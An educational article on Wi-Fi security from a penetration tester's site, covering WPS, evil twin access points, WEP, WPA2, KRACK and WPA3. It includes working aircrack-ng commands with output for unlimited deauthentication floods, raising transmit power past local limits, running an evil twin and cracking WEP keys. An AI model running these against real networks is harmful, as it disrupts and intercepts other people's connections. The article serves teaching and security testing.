Header Image

Roman Hergenreder

IT-Security Consultant / Penetration Tester

WLAN Security Presentation

An article about wireless protocols and their security. This article is part of a presentation made for The Hacker Contest module. The presentation slides can be downloaded here (German).

Authors: Roman Hergenreder, Lars Prepens
This article and the presentation contain slides of Mathy Vanhoef Last modified: 2022-09-06 09:29:51

Table of Contents

  1. WLAN Security
    1. General
    2. Wi-Fi Protected Setup (WPS)
    3. Evil Twin
  2. Wired Equivalent Privacy (WEP)
    1. WEP: Security Flaws
    2. Cracking WEP
  3. Wi-Fi Protected Access (WPA)
    1. Security improvements: WPA2
    2. Key reinstallation attack (KRACK)
  4. Upcoming: WPA3
  5. Resources
As the number of wireless devices (Smartphones, Notebooks, TVs, Light bulbs…) rises and it's easier to connect using wireless networks than using cables, the WLAN-security becomes even more important. Wireless technology implies no need for phyical access which is of course useful for mobile devices on the one hand but also emerges risks on the other hand, as the medium is publicly accessible. Attackers can easily capture (optimally) encrypted traffic without anyone noticing. Attackers also can hide attacking devices (like a small Raspberry PI or something similar) in range of the wireless gateway or just attack "from outside" without needing to enter company buildings for example. Public hotspots like in cafes, libraries and airports are popular targets for attackers.
[wireless attacker]
In the following sections, we will focus on wireless networks deployed in infrastructure mode. This is the most common case in private networks and for example small company networks, where a base station acts as an access point. There may be multiple connected access points with the same SSID and connecting to one of them results in joining the network of these access points.
Nowadays the WLAN standard is defined by the Wi-Fi Alliance [2]. It is a non-profit organization founded in 1999 with about 800 companies involved today. They certify products for conformity to certain standards like Wi-Fi, WPS, WPA, Miracast and much more [3].
When analysing the security of such WLAN networks, we first need to know, how they work in general. The IEEE 802.11 [1] standard is part of the set of Local Area Network (LAN) protocols and it contains wireless protocols operating on the MAC (media access control) and the physical layer. Part of this standard is the service set (also known as extendes service set or ESS). It defines a group of wireless network dwevices indentified by the same name called the SSID (service set identifier). They are usually natural language labels, which are seen on the "nearby WLAN list", when connecting to an access point. The BSSID is a 48-bit-label and defines a subgroup of devices operating on the same physical layer i.e. frequency, security settings and so on. It can be either a random number of the device's mac address. A device can have multiple BSSIDs, but usually they uniquely define an access point.
If a wireless network is not hidden, the access point usually broadcasts this customizable SSID to announce it's presence periodically. These broadcast packets are called Beacon Packets. Hidden networks usually have a null SSID (zero length SSID field). But a client may also broadcast a probe request to ask, which access points are nearby available.
[wireless probing]
When the client got the SSID to connect to, the used protocol decides how to continue, e.g. perform router authentication, exchange/generate connection keys, perform handshakes. The attack vector and the protocol used determine our chances of success. Some common attacks are described in the following paragraphs.
Wi-Fi Protected Setup is a network security standard to create and configure a secure wireless network. It should provide a simple method to add new devices to an existing network without needing to enter a passphrase. There are four possible modes:
While the USB and NFC method seems to be safe, the PIN method is rather vulnerable. In December 2011 a security flaw was revealed in which the PIN could be recovered within hours using a bruteforce attack. In general the PIN has seven numeric digits what means, there are 10^7 = 10.000.000 possible combinations, which allows an online or offline bruteforce, if the handshake is captured. Besides that, if the access point is not placed in a safe location, an attacker can easily use the push-button or NFC method or just read the PIN and other sensitive data. to gain access to the network.
In contrast to physical connections, an attacker can't perform a man in the middle attack in the same way, like blocking or manipulating packets. To achieve this and to perform attacks like KRACK we need to set up an Evil Twin [4]. An evil twin is a cloned access point with an identical SSID and MAC-address. Careless users may connect to the malicious access point and potentially transmit unencrypted data which can in the worst case contain sensitive information like credentials, bank data or personal information. However, when an access point with the same SSID/MAC-address is already registered on the client's device, it trys to authenticate with the configured method e.g. WEP, WPA or WPA2. As we don't know the original router's secrets, clients won't accept the connection. The other way is forwarding packets to the original access point on a different channel, which gives us the ability to block/delay/modify/resend packets, but we won't be able to decrypt the traffic in the first place.
[evil twin]
But we can also force clients to connect to our malicious access point: Before WPA3 managment packets are transmitted unencrypted, as described later. Thus, we can send deauthentication packets [5] with spoofed source addresses to force the connection to be interrupted and the client has to re-authenticate. When using a stronger signal, the client rather connects to our access point, as it's assumed to be "closer". This deauthentication can be forced using aircrack-ng [6] as seen below:
If the router's mac-address is not known yet, we can use the following command, otherwise you can skip this step. Note: You might need to kill other network processed like the tool tells you, as it might interfere with the minitor mode.
$ airmon-ng start wlan0
PHY Interface Driver Chipset

phy1 wlan0 rt2800usb Ralink Technology, Corp. RT2870/RT3070

(mac80211 monitor mode vif enabled for [phy1]wlan0 on [phy1]wlan0mon)
(mac80211 station mode vif disabled for [phy1]wlan0)
The above command puts our wireless interface wlan0 into monitor mode, it can be accessed with wlan0mon now.
$ airodump-ng wlan0mon
CH 14 ][ Elapsed: 24 s ][ 2020-01-02 18:43

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:XX:XX:XX:XX:XX -41 13 32 0 6 130 WPA2 CCMP PSK XXXXXXXXX
AC:XX:XX:XX:XX:XX -56 15 0 0 6 130 WPA2 CCMP PSK XXXXXXXXX
AE:XX:XX:XX:XX:XX -51 13 0 0 6 130 WPA2 CCMP MGT XXXXXXXXX
54:XX:XX:XX:XX:XX -63 13 0 0 1 270 WPA2 CCMP PSK XXXXXXXXX
78:XX:XX:XX:XX:XX -69 15 0 0 11 130 WPA2 CCMP PSK XXXXXXXXX
AC:XX:XX:XX:XX:XX -74 14 0 0 11 130 WPA2 CCMP PSK XXXXXXXXX
02:XX:XX:XX:XX:XX -78 3 0 0 6 130 WPA2 CCMP PSK <length: 21>
4C:XX:XX:XX:XX:XX -76 13 0 0 6 260 OPN XXXXXXXXX
We can see a list of nearby routers identified by the BSSID, the used encryption and authentication method. There is even a hidden access point (<length: 21>), where the SSID has probably 21 characters but is not broadcasted [8]. We could obtain the real SSID by waiting for an authentication (or sending deauth packets) or bruteforcing it. The last access point in the list does not have an authentication method, so it's a public WLAN.
If we want to see, which clients are connecting to a given access point, we can use the following command, where parameter c is the used channel. Because we often want to see, which clients are already connected, we can deauthenticate them first to force them to authenticate again, so we can capture the mac address.
$ airodump-ng -c 6 --bssid 38:XX:XX:XX:XX:XX wlan0mon
CH 6 ][ Elapsed: 1 min ][ 2020-01-02 19:11 ][ WPA handshake: 38:XX:XX:XX:XX:XX

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:XX:XX:XX:XX:XX -36 96 943 459 0 6 130 WPA2 CCMP PSK XXXXXXXXX

BSSID STATION PWR Rate Lost Frames Probe

38:XX:XX:XX:XX:XX B8:XX:XX:XX:XX:XX -48 1e-24e 0 511
To deauthenticate clients connected to a certain access point, we can now execute the following command, where parameter a is the router's BSSID and --deauth the number of deauthentication packets to send or 0 for infinity. We can additionally specify a client mac address with parameter c. This is also desribed in  [7]
$ aireplay-ng --deauth 0 -a 38:XX:XX:XX:XX:XX wlan0mon
20:29:40 Sending DeAuth (code 7) to broadcast -- BSSID: [38:XX:XX:XX:XX:XX]
20:29:41 Sending DeAuth (code 7) to broadcast -- BSSID: [38:XX:XX:XX:XX:XX]
20:29:41 Sending DeAuth (code 7) to broadcast -- BSSID: [38:XX:XX:XX:XX:XX]
20:29:42 Sending DeAuth (code 7) to broadcast -- BSSID: [38:XX:XX:XX:XX:XX]
You may want to increase the transmission power of your WLAN card, by setting the regulatory agent (reg) to BO (bolivia), as every country has their own regulation on maximum allowed transmission power and in bolivia 1000mW is allowed. Note: Please use this (and all the other) commands with caution. Stick to your national regulations if you don't want to get any trouble.
$ iw reg set BO
Another way to force clients to connect to our evil twin is sending spoofed channel switch announcements.
Now we got everything we need to set up a real evil twin. The following command set's up a public WLAN without a password. You can also specify the access point's mac address using the --bssid flag, but this did not work for me somehow
$ airbase-ng -e "<FAKE SSID>" -c 6 wlan0mon
21:15:05 Created tap interface at0
21:15:05 Trying to set MTU on at0 to 1500
21:15:05 Access Point with BSSID 7C:XX:XX:XX:XX:XX started.
The Wired Equivalent Privacy [9] is a standard also part of IEEE 802.11 and was originally introduced in 1997. The intention was to provide access control, data integrity and confidentiality using an Integration Code (IVC) and XOR stream cipher. In 2003, WPA was declared as the new standard and as of 2004 WEP got deprecated. Interesting fact: WEP was already weak when released, as US restrictions on the export of wireless technology restricted devices to use only 64-bit encryption, but later also "stronger" encryptions were allowed. The WEP key usually is 40-bit (64-bit mode) or 104-bit (128-bit mode).
When a client attempts to connect to a WEP-based wireless network, a challenge-reponse authentication is performed. After the probe request/response the server sends a challenge, which is some random data, the client has to encrypt with his WEP key and send it back to the access point. The access point encrypts his challenge and compares it with the received response, if it matches, the client is successfully authenticated and the WEP key is used for further encryption.
[WEP challenge response authentication] WEP challenge response authentication [11]
After a client successfully authenticated, every data packet is encrypted using the following scheme:
  1. A random 24-bit Initialization Vector (IV) is calculated.
  2. A RC4 key is generated by combining the IV and the WEP key.
  3. Using CRC-algorithm an Integrity Check Value (ICV) is calculated.
  4. The message M and ICV are xored using a key-stream generated by RC4
  5. The encrypted packet is now combined by the plaintext IV and the encrypted message.
[WEP encryption] WEP encryption protocol [10]
The decryption works the same way. The client can generate the RC4 key and key-stream using the publicly known IV and his WEP key. The decryption and integrity can then be checked with the appended ICV after decrypting the message.
WEP has multiple vulnerabilities and should not be used anymore:
To efficiently crack WEP and re-calculate the used key, we need to capture about 80.000 packets. Usually, the more packets captured, the faster the algorithm is. For further commands it is required to have an interface enabled in monitor mode. You also need to know the BSSID of the access point using WEP. These steps are described in Evil Twin.
$ airodump-ng -w wepdump -c <channel> --bssid <bssid> wlan0mon
Using the above command, we can dump traffic for the given access point to a file wepdump. After we captured a sufficient amount of packets, we can run the following command, to crack the wep key:
$ aircrack-ng wepdump.cap
We may need to generate traffic to collect more IVs. This can be done by injecting the same ARP request again and again. The access point will respond with an encrypted packet and a new IV for every packet. Note: This will make the attack active, as we are manipulating the network and don't only collect IVs passivly anymore.
$ aireplay-ng --arpreplay …
Wi-Fi protected access is the following standard after WEP and works on a similar basis but includes many improvements. The first version of WPA was certified in 2003 and was superseded by WPA2 after 2004. The differences and improvements to WEP are listed below:
Unfortunately, WPA is insecure because TKIP uses the same underlying mechanism as WEP.
Besides that, a common attack is still bruteforce using dictionaries. Access points are often insecure due to weak passwords or default passwords provided by the manufacturers. Router KeyGen [15] is such a tool, which can calculate default passwords based on the device mac address for example.
With WPA2 released in 2004 it's the mostly used standard nowadays. It was secure for about 15 years now, and it was even been mathematically proved to be secure. The only requirement: the handshake is performed correctly. The most important improvement to WPA is the used encryption method.
WPA2 uses Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP) instead of the vulnerable TKIP method. CCMP is based on AES-CCM and combines the CTR-mode for confidentiality and CBC-MAC mode for authentication and integrity. It is not possible to forge frames as an attacker using this algorithm. There is a list of known attacks including side channel attacks [17] and attacks, which lower the needed rounds for breaking the key [16], but there is no practial attack to read the encrypted data without knowledge of the key.
[WPA four-wy-handshake]
Source: KRACKing WPA2 by Forcing Nonce Reuse, Mathy Vanhoef, 34c3 [18]
The four-way handshake performed in WPA2 works simplified according to these steps:
  1. Optional authentication checking using a pre-shared secret like password (PSK), credentials, certificate (Enterprise)
  2. Access point generates a random Access Nonce (ANonce) and sends it to the client
  3. Client generates a random Supplicant Nonce (SNonce) and sends it back to the access point
  4. Client and Access Point derive the Pairwise Transient Key PTK = Combine(shared secret, ANonce and SNonce).
  5. AP derives the Group Temporal Key GTK used for decrypting multicast/broadcast messages and sends it to the client with a MIC
  6. Client verifies the MIC and responds, that everything is OK. Both Client and AP install the PTK (and Client the GTK) now.
After this handshake is performed, encrypted data frames can be exchanged.
KRACK was published in October 2017 and affected alot of devices, which used WPA or WPA2, even though, WPA2 was mathematically proven to be secure [19]. This is because, KRACK affects the handshake phase so the prove is still valid as the requirement is not fulfilled anymore. KRACK affects various handshakes, like the four-way-handshake, the group handshake or the Fast Roaming handshake but only because the implementations did not exactly follow the (unclear) standard.
[krack nonce reuse]
Source: KRACKing WPA2 by Forcing Nonce Reuse, Mathy Vanhoef, 34c3 [18]
It works as following:
  1. The attacker launchs a man-in-the-middle attack either by using a stronger signal or spoofing a Switch Channel Announcement (CSA)
  2. When the 4-way-handshake is performed, forward the first three messages (ANonce, SNonce, GTK).
  3. The client installs the PTK, initialises the Packet Nonce with zero and sends the fourth message.
  4. The fourth message is not forwarded (so simply blocked). The access points retransmits message three because the 4th message is not received.
  5. The client reinstalls the PTK and re-initialises the Packet Nonce with zero.
  6. The client retransmits packet four, but encrypted.
  7. If the client has already sent an encrypted packet with the installed PTK and zero packet nonce, we got a nonce reuse and therefore can decrypt the packet.
There are still some misconceptions, that Mathy Vanhoef also mentioned in his presentation:
WPA2 can still be used on patched devices, but it is recommended to switch to WPA3, as soon as it will be available.
WPA3 brings alot of new features including OWE and SAE [20]. The standard was first announced in January 2018 by the Wi-Fi Alliance. It provides the following improvements:
There is no possibility for passive/offline attacks against OWE and SAE. Protected managment frames are required for all of the named improvements. Unfortunately, the Dragonfly Handshake already suffers from a vulnerability called Dragonblood [21]. Five vulnerabilities are part of this attack including Denial-of-Service, downgrade attacks and side-channel information leakage. Good news: these vulnerabilities can be fixed through software updates.

Resources

  1. https://en.wikipedia.org/wiki/IEEE_802.11
  2. https://www.wi-fi.org/
  3. https://www.wi-fi.org/who-we-are/our-brands
  4. https://www.offensive-security.com/kali-linux/kali-linux-evil-wireless-access-point/
  5. https://en.wikipedia.org/wiki/Wi-Fi_deauthentication_attack
  6. https://www.aircrack-ng.org/
  7. https://hackernoon.com/forcing-a-device-to-disconnect-from-wifi-using-a-deauthentication-attack-f664b9940142
  8. https://aircrack-ng.org/doku.php?id=airodump-ng#hidden_ssids_length
  9. https://en.wikipedia.org/wiki/Wired_Equivalent_Privacy
  10. https://upload.wikimedia.org/wikipedia/commons/thumb/a/ae/WEP_Kodierung.JPG/1920px-WEP_Kodierung.JPG
  11. https://www.muppie.be/09art/images/wlansec/wlanauthenticationstack.jpg
  12. https://eprint.iacr.org/2007/120.pdf
  13. https://en.wikipedia.org/wiki/RC4#Security
  14. https://tools.ietf.org/html/rfc7465
  15. https://routerkeygen.github.io/
  16. https://en.wikipedia.org/wiki/Advanced_Encryption_Standard#Known_attacks
  17. https://en.wikipedia.org/wiki/Advanced_Encryption_Standard#Side-channel_attacks
  18. https://media.ccc.de/v/34c3-9273-kracking_wpa2_by_forcing_nonce_reuse
  19. https://dl.acm.org/doi/pdf/10.1145/1102120.1102124
  20. https://media.ccc.de/v/2018-132-wpa3-mehr-sicherheit-fr-wlan-netzwerke
  21. https://www.zdnet.com/article/dragonblood-vulnerabilities-disclosed-in-wifi-wpa3-standard/